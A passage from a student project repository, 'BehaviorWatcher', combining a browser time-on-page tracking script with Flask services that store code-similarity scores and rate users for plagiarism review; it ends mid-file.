"text": "class Watcher {\n\tconstructor(host, options) {\n\t\tthis.startStopTimes = {};\n\t\tthis.idleTimeoutMs = 30 * 1000;\n\t\tthis.currentIdleTimeMs = 0;\n\t\tthis.checkIdleStateRateMs = 250;\n\t\tthis.isUserCurrentlyOnPage = true;\n\t\tthis.isUserCurrentlyIdle = false;\n\t\tthis.currentPageName = \"default-page-name\";\n\t\tthis.timeElapsedCallbacks = [];\n\t\tthis.userLeftCallbacks = []\n\t\tthis.userReturnCallbacks = [];\n\t\tthis.initialStartTime = undefined;\n\n\t\tlet trackWhenUserLeavesPage = true;\n\t\tlet trackWhenUserGoesIdle = true;\n\n\t\tif (options) {\n\t\t\tthis.idleTimeoutMs = options.idleTimeoutInSeconds*1000 || this.idleTimeoutMs;\n\t\t\tthis.currentPageName = options.currentPageName || this.currentPageName;\n\t\t\tthis.initialStartTime = options.initialStartTime;\n\n\t\t\tif (options.trackWhenUserLeavesPage === false)\n\t\t\t\ttrackWhenUserLeavesPage = false;\n\n\t\t\tif (options.trackWhenUserGoesIdle === false)\n\t\t\t\ttrackWhenUserGoesIdle = false;\n\t\t}\n\n\t\tthis.setUpConnection(host);\n\n\t\tthis.setIdleDurationInSeconds(this.idleTimeoutMs / 1000);\n\t\tthis.setCurrentPageName(this.currentPageName);\n\t\tthis.listenEvents(trackWhenUserLeavesPage, trackWhenUserGoesIdle);\n\n\t\tthis.startTimer(this.currentPageName, this.initialStartTime);\n\t}\n\n\tstartTimer(pageName, startTime) {\n\t\tif (!pageName)\n\t\t\tpageName = this.currentPageName;\n\n\t\tif (this.startStopTimes[pageName] === undefined)\n\t\t\tthis.startStopTimes[pageName] = [];\n\t\telse {\n\t\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\t\tlet latestStartStopEntry = arrayOfTimes[arrayOfTimes.length - 1];\n\t\t\tif (latestStartStopEntry !== undefined && latestStartStopEntry.stopTime === undefined)\n\t\t\t\treturn;\n\t\t}\n\n\t\tthis.startStopTimes[pageName].push({\n\t\t\t\"startTime\": startTime || new Date(),\n\t\t\t\"stopTime\": undefined\n\t\t});\n\t}\n\n\tstopAllTimers() {\n\t\tlet pageNames = Object.keys(this.startStopTimes);\n\t\tfor (let i = 0; i < pageNames.length; i++)\n\t\t\tthis.stopTimer(pageNames[i]);\n\t}\n\n\tstopTimer(pageName, stopTime) {\n\t\tif (!pageName) \n\t\t\tpageName = this.currentPageName;\n\n\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\tif (arrayOfTimes === undefined || arrayOfTimes.length === 0)\n\t\t\treturn;\n\n\t\tif (arrayOfTimes[arrayOfTimes.length - 1].stopTime === undefined)\n\t\t\tarrayOfTimes[arrayOfTimes.length - 1].stopTime = stopTime || new Date();\n\t}\n\n\tgetTimeOnPageInSeconds(pageName) {\n\t\tlet timeInMs = this.getTimeOnPageInMilliseconds(pageName);\n\t\tif (timeInMs === undefined)\n\t\t\treturn undefined;\n\t\telse\n\t\t\treturn timeInMs / 1000;\n\t}\n\n\tgetTimeOnPageInMilliseconds(pageName) {\n\t\tif (!pageName)\n\t\t\tpageName = this.currentPageName;\n\n\t\tlet totalTimeOnPage = 0;\n\n\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\tif (arrayOfTimes === undefined)\n\t\t\treturn;\n\n\t\tlet timeSpentOnPageInSeconds = 0;\n\t\tfor (let i = 0; i < arrayOfTimes.length; i++) {\n\t\t\tlet startTime = arrayOfTimes[i].startTime;\n\t\t\tlet stopTime = arrayOfTimes[i].stopTime;\n\t\t\tif (stopTime === undefined)\n\t\t\t\tstopTime = new Date();\n\n\t\t\tlet difference = stopTime - startTime;\n\t\t\ttimeSpentOnPageInSeconds += (difference);\n\t\t}\n\n\t\ttotalTimeOnPage = Number(timeSpentOnPageInSeconds);\n\t\treturn totalTimeOnPage;\n\t}\n\n\tsetIdleDurationInSeconds(duration) {\n\t\tlet durationFloat = parseFloat(duration);\n\n\t\tif (isNaN(durationFloat) === false)\n\t\t\tthis.idleTimeoutMs = duration * 1000;\n\t\telse {\n\t\t\tthrow {\n\t\t\t\tname: \"InvalidDurationException\",\n\t\t\t\tmessage: \"An invalid duration time (\" + duration + \") was provided.\"\n\t\t\t};\n\t\t}\n\t}\n\n\tsetCurrentPageName(pageName) {\n\t\tthis.currentPageName = pageName;\n\t}\n\n\tuserActivityDetected() {\n\t\tif (this.isUserCurrentlyIdle)\n\t\t\tthis.triggerUserHasReturned();\n\n\t\tthis.resetIdleCountdown();\n\t}\n\n\tresetIdleCountdown() {\n\t\tthis.isUserCurrentlyIdle = false;\n\t\tthis.currentIdleTimeMs = 0;\n\t}\n\n\ttriggerUserHasReturned() {\n\t\tif (!this.isUserCurrentlyOnPage) {\n\t\t\tthis.isUserCurrentlyOnPage = true;\n\t\t\tthis.resetIdleCountdown();\n\n\t\t\tfor (let i = 0; i < this.userReturnCallbacks.length; i++) {\n\t\t\t\tlet userReturnedCallback = this.userReturnCallbacks[i];\n\t\t\t\tlet numberTimes = userReturnedCallback.numberOfTimesToInvoke;\n\n\t\t\t\tif (isNaN(numberTimes) || (numberTimes === undefined) || numberTimes > 0) {\n\t\t\t\t\tuserReturnedCallback.numberOfTimesToInvoke -= 1;\n\t\t\t\t\tuserReturnedCallback.callback();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tthis.startTimer();\n\t}\n\t\n\ttriggerUserHasLeftPageOrGoneIdle() {\n\t\tif (this.isUserCurrentlyOnPage) {\n\t\t\tthis.isUserCurrentlyOnPage = false;\n\n\t\t\tfor (let i = 0; i < this.userLeftCallbacks.length; i++) {\n\t\t\t\tlet userHasLeftCallback = this.userLeftCallbacks[i];\n\t\t\t\tlet numberTimes = userHasLeftCallback.numberOfTimesToInvoke;\n\n\t\t\t\tif (isNaN(numberTimes) || (numberTimes === undefined) || numberTimes > 0) {\n\t\t\t\t\tuserHasLeftCallback.numberOfTimesToInvoke -= 1;\n\t\t\t\t\tuserHasLeftCallback.callback();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tthis.stopAllTimers();\n\t}\n\n\tcheckIdleState() {\n\t\tfor (let i = 0; i < this.timeElapsedCallbacks.length; i++) {\n\t\t\tif (this.timeElapsedCallbacks[i].pending && this.getTimeOnPageInSeconds() > this.timeElapsedCallbacks[i].timeInSeconds) {\n\t\t\t\tthis.timeElapsedCallbacks[i].callback();\n\t\t\t\tthis.timeElapsedCallbacks[i].pending = false;\n\t\t\t}\n\t\t}\n\n\t\tif (this.isUserCurrentlyIdle === false && this.currentIdleTimeMs > this.idleTimeoutMs) {\n\t\t\tthis.isUserCurrentlyIdle = true;\n\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t} else\n\t\t\tthis.currentIdleTimeMs += this.checkIdleStateRateMs;\n\t}\n\n\tlistenEvents(trackWhenUserLeavesPage, trackWhenUserGoesIdle) {\n\t\tif (trackWhenUserLeavesPage)\n\t\t\tthis.listenForUserLeavesOrReturnsEvents();\n\n\t\tif (trackWhenUserGoesIdle)\n\t\t\tthis.listenForIdleEvents();\n\t}\n\n\tlistenForUserLeavesOrReturnsEvents() {\n\t\tlet visibilityChangeEventName = undefined;\n\t\tlet hiddenPropName = undefined;\n\n\t\tif (typeof document.hidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"hidden\";\n\t\t\tthis.visibilityChangeEventName = \"visibilitychange\";\n\t\t} else if (typeof document.mozHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"mozHidden\";\n\t\t\tthis.visibilityChangeEventName = \"mozvisibilitychange\";\n\t\t} else if (typeof document.msHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"msHidden\";\n\t\t\tthis.visibilityChangeEventName = \"msvisibilitychange\";\n\t\t} else if (typeof document.webkitHidden !== \"undefined\") {\n\t\t\tthis.hiddenPropName = \"webkitHidden\";\n\t\t\tthis.visibilityChangeEventName = \"webkitvisibilitychange\";\n\t\t}\n\n\t\tdocument.addEventListener(this.visibilityChangeEventName, () => {\n\t\t\tif (document[this.hiddenPropName])\n\t\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t\telse\n\t\t\t\tthis.triggerUserHasReturned();\n\t\t}, false);\n\n\t\twindow.addEventListener('blur', () => {\n\t\t\tthis.triggerUserHasLeftPageOrGoneIdle();\n\t\t});\n\n\t\twindow.addEventListener('focus', () => {\n\t\t\tthis.triggerUserHasReturned();\n\t\t});\n\t}\n\n\tlistenForIdleEvents() {\n\t\tdocument.addEventListener(\"mousemove\", () => { this.userActivityDetected(); });\n\t\tdocument.addEventListener(\"keyup\", () => { this.userActivityDetected(); });\n\t\tdocument.addEventListener(\"touchstart\", () => { this.userActivityDetected(); });\n\t\twindow.addEventListener(\"scroll\", () => { this.userActivityDetected(); });\n\n\t\tsetInterval(() => {\n\t\t\tif (this.isUserCurrentlyIdle !== true)\n\t\t\t\tthis.checkIdleState();\n\t\t}, this.checkIdleStateRateMs);\n\t}\n\n\tsetUpConnection(host) {\n\t\tthis.host = host;\n\n\t\t//window.addEventListener('pagehide', () => {this.sendCurrentTime()});\n\t\t//window.addEventListener('beforeunload', () => {this.sendCurrentTime()});\n\n\t\t$(window).on('beforeunload', () => {this.sendCurrentTime()});\n\t\t//$(window).on('unload', () => {this.sendCurrentTime()});\n\t}\n\n\tsendCurrentTime() {\n\t\tconst data = JSON.stringify({\n\t\t\t'userId': 12345,\n\t\t\t'taskId': 666,\n\t\t\t'secondsOnPage': this.getTimeOnPageInSeconds(),\n\t\t\t'taskCopied': true\n\t\t});\n\n\t\tif (navigator.sendBeacon) {\n\t\t\tnavigator.sendBeacon(this.host, new Blob([data], {type: 'application/json'}));\n\t\t} else {\n\t\t\t/*let xhr = new XMLHttpRequest();\n\t\t\txhr.open(\"POST\", host);\n\t\t\txhr.setRequestHeader(\"Content-Type\", \"application/json;charset=UTF-8\");\n\t\t\txhr.onopen = () => {xhr.send(data)};*/\n\n\t\t\t$.post({\n\t\t\t\turl: '/metric',\n\t\t\t\tdataType: 'json',\n\t\t\t\tcontentType: 'application/json; charset=utf-8',\n\t\t\t\tdata: data,\n\t\t\t\tsuccess: () => {}\n\t\t\t});\n\t\t}\n\t}\n};\n"
},
{
"alpha_fraction": 0.5258092880249023,
"alphanum_fraction": 0.556430459022522,
"avg_line_length": 26.214284896850586,
"blob_id": "fa3712e8e23c02c3d6da1ab470045bb8a31fe0de",
"content_id": "2452215444bfade9efdcf0ee7604ae2e124f1c93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1143,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 42,
"path": "/backend/generator.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import json\nimport random\n\nfrom datetime import date\n\n\ndef generate_users():\n random.seed(1234)\n users = []\n\n for i in range(5000):\n user = {\n 'id': i,\n 'task_id': random.randrange(3),\n 'language_id': random.randrange(0, 3),\n 'sending_task_time': date(year=2021 - random.randrange(2), month=8 - random.randrange(2),\n day=1 + random.randrange(25)),\n 'test_passed': bool(random.randrange(2)),\n 'stole_from': [random.randrange(1000) for i in range(random.randrange(4))],\n 'reputation': int(random.random() * 100),\n 'course_year': random.randrange(4) + 1,\n 'faculty_id': random.randrange(3),\n 'university_id': random.randrange(3)\n }\n\n users.append(user)\n\n return users\n\n\ndef save_users_to_file(filename, users):\n f = open(filename + '.json', 'w')\n f.write(json.dumps(users, indent=4, sort_keys=True, default=str))\n f.close()\n\n\ndef load_users_from_file(filename):\n f = open(filename + '.json', 'r')\n users = json.load(f)\n f.close()\n\n return users\n"
},
{
"alpha_fraction": 0.49050086736679077,
"alphanum_fraction": 0.5874112248420715,
"avg_line_length": 31.568750381469727,
"blob_id": "327eb96fed80df908a19692f8cb22c8d8699a3a9",
"content_id": "15f0079f118ee8435bcbe666ccca4fce84ab5145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5211,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 160,
"path": "/backend/verifications.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /verification route\n\"\"\"\nimport json\nimport filter\n\nfrom thirdparty import db\nfrom models import (Verification, Error, VerificationSchema, ErrorSchema)\n\nerrorSchema = ErrorSchema()\nverificationSchema = VerificationSchema()\n\napiResponse = \"\"\"{\n \"Version\": \"1\",\n \"SolutionID\": \"original.py\",\n \"MaxSimilarity\": 0.9806427276796765,\n \"MaxSimilaritySolutionID\": \"different_comments.py\",\n \"Verdict\": \"CLEAR POSITIVE\",\n \"Scores\": [\n {\n \"SolutionID\": \"different_comments.py\",\n \"TotalScore\": 0.9806427276796765,\n \"TextBasedScore\": 1,\n \"TokenBasedScore\": 0.9955476522445679,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9825788140296936,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reformatted.py\",\n \"TotalScore\": 0.971757612294621,\n \"TextBasedScore\": 0.9889094233512878,\n \"TokenBasedScore\": 0.9714533090591431,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9822232723236084,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"renamed_variables.py\",\n \"TotalScore\": 0.9180482551455498,\n \"TextBasedScore\": 0.7295423150062561,\n \"TokenBasedScore\": 1,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.942650705575943,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reordered.py\",\n \"TotalScore\": 0.9036459699273109,\n \"TextBasedScore\": 0.8485981523990631,\n \"TokenBasedScore\": 0.9040516316890717,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.861934095621109,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_additional_imports.py\",\n \"TotalScore\": 0.8646872325075997,\n \"TextBasedScore\": 0.8857616186141968,\n \"TokenBasedScore\": 0.9573742747306824,\n \"MetricBasedScore\": 0.8888888888888888,\n \"BinaryBasedScore\": 0.7267241477966309,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_functions.py\",\n \"TotalScore\": 0.5494582574400637,\n \"TextBasedScore\": 0.4490084946155548,\n \"TokenBasedScore\": 0.679684579372406,\n \"MetricBasedScore\": 0.7222222222222222,\n \"BinaryBasedScore\": 0.3469177335500717,\n \"TreeBasedScore\": null\n }\n ]\n}\"\"\"\n\n\ndef get_one(solution_id):\n \"\"\"\n Respond to a GET request for /verifications/{solutionId}\n Returns specified verification\n\n :param solution_id Id of the verification to return\n :return (verification, 200) | (404)\n \"\"\"\n\n\n# verification = Verification.query.filter(Verification.id == solutionId).one_or_none()\n# if verification is None:\n# errorSchema.dump(Error(f\"Metric with metricId: {solutionId} does not exists\")), 400\n\n# return verificationSchema.dump(verification), 200\n\n# 1. Get solution entity with userId, task, etc from other DB\n# 2. Get another data\n# 4. Calculate something\n# 5. ...\n# 6. Magic\n# 7. Profit\n\n# 1. K\n# 2. I\n# 4. L\n# 5. L\n# 6. M\n# 7. E\n\n\ndef post(solution_id):\n try:\n # 1. Get solution entity with userId, task, etc from other DB\n solution_id = 1\n\n # 2. filter users (filter.py)\n filter(solution_id)\n\n # 3. call API of other module\n\n # apiResponse = request(...) # TODO: real request\n response = json.loads(apiResponse)\n for i in response['Scores']:\n verification = Verification(**{\n 'source_solution_id': i['SolutionID'],\n 'destination_solution_id': solution_id,\n 'source_user_id': 4, # TODO: change to real id\n 'destination_user_id': 6, # TODO: change to real id\n 'task_id': 59, # TODO: change to real id\n 'verdict_of_module': response['Verdict'],\n 'total_score': i['TotalScore'],\n 'text_based_score': i['TextBasedScore'],\n 'token_based_score': i['TokenBasedScore'],\n 'metric_based_score': i['MetricBasedScore'],\n 'binary_based_score': i['BinaryBasedScore'],\n 'tree_based_score': i['TreeBasedScore']\n })\n\n db.session.add(verification)\n\n # 4. save result to our DB (especially to Verification TABLE)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(str(e)) # TODO: delete\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(solution_id, body):\n try:\n if body.get('is_plagiarism'):\n Verification.query.filter(Verification.destination_solution_id == solution_id).update(\n {Verification.verdict_of_human: True})\n else:\n Verification.query.filter(Verification.destination_solution_id == solution_id).delete();\n\n db.session.commit()\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6949806809425354,
"avg_line_length": 27.77777862548828,
"blob_id": "75ecb8e8c8e2056da2725e77cadb51508e2ad73e",
"content_id": "feafcabca39dcc82a2334bfc18ba5b368d38035b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 348,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 9,
"path": "/frontend/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# Frontend\n\n## Развертывание \n\n### server.py\n\n0. (Опционально) Установить переменные окружения ```APPLICATION_HOST``` и ```APPLICATION_PORT```\n1. Подтянуть зависимости: ``` $ pip3 install -r requirements.txt```\n2. Запустить сервер: ``` $ python3 server.py```\n"
},
{
"alpha_fraction": 0.7138461470603943,
"alphanum_fraction": 0.7184615135192871,
"avg_line_length": 33.21052551269531,
"blob_id": "5eb81487b69486811d5070e2baa7eed7e4fd69f2",
"content_id": "6dd7bcdbdc4a9a320368e8a4fad578046508047f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 19,
"path": "/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# BehaviorWatcher\n\n## Структура проекта\n\n* ```/dist``` + ```index.html``` - для просмотра swagger на github pages\n* ```/backend``` - независимый сервер для работы BehaviorWatcher\n* ```/frontend``` - независимый сервер для проверки работы скрипта, который собирает статистику и отправляет на сервер\n\n## Развёртывание\n\n### С использованием Docker\n\n1. Ставим на Вашу ОС [Docker](https://www.docker.com/) и [docker-compose](https://docs.docker.com/compose/)\n2. Запускаем контейнеры: ``` $ docker-compose up --build -d```\n3. Проверяем их статус: ``` $ docker-compose ps```\n\n### Ручное\n\n*Следуем инструкции по развертыванию для каждого отдельного сервиса*\n"
},
{
"alpha_fraction": 0.5106382966041565,
"alphanum_fraction": 0.585106372833252,
"avg_line_length": 15.588234901428223,
"blob_id": "e5ea2deca6b71b61c858a3577ec71ce0878ab066",
"content_id": "77e6f8681589f156445d2d5afc89d9d0a61f0158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 17,
"path": "/docker-compose.yml",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n backend:\n build: backend\n ports:\n - \"5000:5000\"\n restart: \"always\"\n # TODO: add volume for persistence\n\n frontend:\n build: frontend\n environment:\n - APPLICATION_HOST=0.0.0.0\n ports:\n - \"8080:8080\"\n restart: \"always\"\n"
},
{
"alpha_fraction": 0.6889312863349915,
"alphanum_fraction": 0.694656491279602,
"avg_line_length": 36.42856979370117,
"blob_id": "d2420b00f97af96ac322c1087b71e644e1af84bd",
"content_id": "251123b10e85de61ad4b8761f1c72818f607ff97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 14,
"path": "/backend/metrics.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from models import Verification\n\n\ndef get_user_rating(user_id):\n sources = len(Verification.query.filter(\n Verification.destination_user_id.like(user_id) & Verification.verdict_of_human.is_(True)).all())\n destinations = len(Verification.query.filter(\n Verification.source_user_id.like(user_id) & Verification.verdict_of_human.is_(True)).all())\n\n if sources + destinations == 0:\n return 0\n\n sources = sources * sources\n return round((destinations - sources) / (destinations + sources), 2)\n"
},
{
"alpha_fraction": 0.6887481808662415,
"alphanum_fraction": 0.689235270023346,
"avg_line_length": 32.1129035949707,
"blob_id": "984891fa1a0e7f49f5809704a433fb63d6cab153",
"content_id": "4992e35966256ce1a60f2feed168fe20d98089d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2053,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 62,
"path": "/backend/models.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from dataclasses import dataclass\nfrom thirdparty import db, ma\n\n\nclass Metric(db.Model):\n # __tablename__ = 'metric'\n\n # while constructing new object don't forget to include required key parameters\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, nullable=False)\n task_id = db.Column(db.Integer, nullable=False)\n reading_time = db.Column(db.Integer, server_default=db.text('0'))\n task_copied = db.Column(db.Boolean, server_default=db.false())\n task_viewed = db.Column(db.Boolean, server_default=db.false())\n\n # Unique pair of (user_id, task_id)\n __table_args__ = (db.UniqueConstraint('user_id', 'task_id', name='_user_task_uc'),) # tuple\n\n\nclass Verification(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n source_solution_id = db.Column(db.Integer, nullable=False)\n destination_solution_id = db.Column(db.Integer, nullable=False)\n\n source_user_id = db.Column(db.Integer, nullable=False)\n destination_user_id = db.Column(db.Integer, nullable=False)\n task_id = db.Column(db.Integer, nullable=False)\n\n verdict_of_module = db.Column(db.String, nullable=True)\n verdict_of_human = db.Column(db.Boolean, server_default=db.false())\n\n total_score = db.Column(db.Float, nullable=True)\n text_based_score = db.Column(db.Float, nullable=True)\n tree_based_score = db.Column(db.Float, nullable=True)\n token_based_score = db.Column(db.Float, nullable=True)\n metric_based_score = db.Column(db.Float, nullable=True)\n binary_based_score = db.Column(db.Float, nullable=True)\n\n __table_args__ = (\n db.UniqueConstraint('source_solution_id', 'destination_solution_id', name='_source_destination_uc'),\n ) # tuple\n\n\n@dataclass\nclass Error:\n message: str\n\n\nclass ErrorSchema(ma.Schema):\n message = ma.Str()\n\n\nclass MetricSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Metric\n include_fk = True\n\n\nclass VerificationSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Verification\n include_fk = True\n"
},
{
"alpha_fraction": 0.7085427045822144,
"alphanum_fraction": 0.7286432385444641,
"avg_line_length": 14.307692527770996,
"blob_id": "d62a2dd8ed3a54424342fb3ad6457acb5bc32e95",
"content_id": "5029483c0da30b24dd398b2080dfd9413fe34902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/frontend/Dockerfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "FROM python:3.9-slim\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\n\nCOPY requirements.txt ./\nRUN pip install -r requirements.txt\n\nCOPY . .\nCMD [\"python3\", \"server.py\"]\n\n# TODO: use wsgi-server in production\n"
},
{
"alpha_fraction": 0.7109004855155945,
"alphanum_fraction": 0.7251184582710266,
"avg_line_length": 14.071428298950195,
"blob_id": "5c399d159b92a6902f37dba2d813bf2ef566ecef",
"content_id": "ff30b843399b7f31fac7422f2a60da133494833d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/backend/Dockerfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "FROM python:3.9-slim\n\nENV PYTHONUNBUFFERED 1\n\nWORKDIR /app\nRUN pip install pipenv\n\nCOPY Pipfile Pipfile.lock ./\nRUN pipenv install\n\nCOPY . .\nCMD [\"pipenv\", \"run\", \"start\"]\n\n# TODO: use wsgi-server in production\n"
},
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 29.85714340209961,
"blob_id": "0d64ce964c333ce0c22500e3eafaa23cc718cb57",
"content_id": "5624be7165aa91e2f21aaa2593f5f771ed180cd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 310,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 7,
"path": "/backend/README.md",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "# Backend\n\n## Развертывание \n\n1. Установить pipenv: ``` $ pip install pipenv```\n2. Установить зависимости ``` $ pipenv install```\n3. Приложение запускается с использованием окружения через ``` $ pipenv run start```\n"
},
{
"alpha_fraction": 0.5961995124816895,
"alphanum_fraction": 0.6508313417434692,
"avg_line_length": 21.157894134521484,
"blob_id": "671788dfb598743a364cffb69175d20b7769e987",
"content_id": "a13308bee667d292c4b8cd014bf95af13ef322cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/backend/Pipfile",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"BehaviorWatcher\"\n\n[packages]\nflask = \"==1.1.4\"\nconnexion = {extras = [\"swagger-ui\"], version = \"==2.9.0\"}\nflask-sqlalchemy = \"==2.5.1\"\nflask-marshmallow = \"==0.14.0\"\nmarshmallow-sqlalchemy = \"==0.26.1\"\npython-dotenv = \"*\"\n\n[requires]\npython_version = \"3.9\"\n\n[scripts]\nstart = \"pipenv run python server.py\"\nlint = \"flake8 --exclude=tests --ignore=E121\"\n"
},
{
"alpha_fraction": 0.6381818056106567,
"alphanum_fraction": 0.6463636159896851,
"avg_line_length": 17.33333396911621,
"blob_id": "3f03a6f93c1e3f63d5f2c6d2309d293c912fac0f",
"content_id": "4c2011324efde4e743861b25f3b754af379471db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 60,
"path": "/frontend/server.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from os import environ\n\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask import abort\nfrom flask import render_template\nfrom flask import send_from_directory\n\napp = Flask(__name__, static_url_path='')\n\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n return send_from_directory('js', path)\n\n\nreadingTime = 0\n\n\[email protected]('/metric', methods=['GET'])\ndef get_metric():\n global readingTime\n\n return jsonify({\n 'reading_time': readingTime,\n 'sdf': False\n })\n\n\[email protected]('/metric', methods=['POST'])\ndef post_metric():\n if not request.is_json:\n abort(400)\n\n data = request.json\n print(data)\n\n global readingTime\n readingTime += int(data['reading_time'])\n\n return jsonify(data)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\ndef main():\n host = str(environ.get(\"APPLICATION_HOST\", \"netx.ru\"))\n port = int(environ.get(\"APPLICATION_PORT\", 8080))\n\n app.run(host=host, port=port)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6661333441734314,
"alphanum_fraction": 0.6751999855041504,
"avg_line_length": 31.327587127685547,
"blob_id": "a183818d51f8698a223e7050a0d01b79ee3b5831",
"content_id": "46ab86ed0a910006d8a184bfa7bd40fdde42606c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3750,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 116,
"path": "/backend/filter.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import sys\nimport metrics\n\nfrom thirdparty import db, fetch\nfrom models import Verification\n\nSUSPECT_AMOUNT = 30\n\nLAST_SOLUTIONS_RATIO = 0.8\nRATING_RATIO = 0.2\n\nLAST_SOLUTIONS_AMOUNT = round(SUSPECT_AMOUNT * LAST_SOLUTIONS_RATIO)\nRATING_AMOUNT = round(SUSPECT_AMOUNT * RATING_RATIO)\n\n\ndef remove_solutions_by_id(solutions, ids):\n l = []\n\n for solution in solutions:\n if solution['Id'] not in ids:\n l.append(solution)\n\n solutions.clear()\n solutions.extend(l)\n\n\ndef get_priority_solutions_ids(solutions):\n # TODO: Change 5 to target.user_id\n priority_verifications = Verification.query.filter(\n Verification.destination_user_id.like(5) & Verification.verdict_of_human.is_(True)).all()\n priority_users_ids = set([i.source_user_id for i in priority_verifications])\n\n priority_solutions_ids = []\n for solution in solutions:\n if solution['OwnerId'] in priority_users_ids:\n priority_solutions_ids.append(solution['Id'])\n\n return priority_solutions_ids\n\n\ndef get_last_solutions_since(date, solutions):\n solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n\n start_index = -1\n for i, solution in enumerate(solutions):\n if solution['CreatedAt'] <= date:\n start_index = i\n break\n\n if start_index == -1:\n return []\n\n return solutions[start_index:]\n\n\ndef get_top_solutions_ids_by_rating(solutions):\n users_ratings = {}\n for id in set([i['OwnerId'] for i in solutions]):\n users_ratings[id] = metrics.get_user_rating(id)\n\n for i in solutions:\n i['Rating'] = users_ratings[i['OwnerId']]\n\n solutions.sort(reverse=True, key=lambda i: 